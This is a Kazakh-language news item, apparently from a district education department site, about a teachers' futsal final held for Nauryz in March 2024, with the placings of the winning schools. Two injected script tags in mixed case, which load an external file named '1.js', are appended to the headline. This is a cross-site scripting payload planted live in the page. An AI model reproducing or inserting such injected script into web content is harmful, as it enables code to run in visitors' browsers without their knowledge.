Целиноград ауданы білім бөлімінің басшысы кубогы үшін жалпы білім беретін мектептерінің педагогтары арасында Футзалдан ақтық сын ойыны<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
19.03.2024
2024 жылдың 17 наурыз күні 22-Наурыз мерекесіне орай, Целиноград ауданы білім бөлімінің басшысы кубогы үшін жалпы білім беретін мектептерінің педагогтары арасында Футзалдан ақтық сын ойыны Ақмол ауылының БЖСМ өтті. Жарыстың мақсаты : Салауатты өмір салтын насихаттау; Педагогтар арасында Футзал ойынын дәріптеу; Аудандағы педагогтарды спорттық ойындарға тарту;
Жарысқа 8 команда қатысты. Жарыстың қорытындысы бойынша командалық есепте
1-орын Қабанбай батыр ауылының ЖОББМ
2-орын Оразақ ауылының ЖОББМ
3-орын Жалғызқұдық ауылының ЖОББМ командалары иеленді . Жеңімпаздар командалар Білім бөлімі тарапынан кубокпен, медальдармен және мақтау қағаздарымен марапатталды . Ойын барысында өзін жақсы жағынан көрсеткен ойыншылар Үздік шабуылшы, Үздік байланыстырушы, Үздік қорғаушы, Үздік қақпашы номинацияларымен марапатталды . Жеңімпаздарды құттықтаймыз!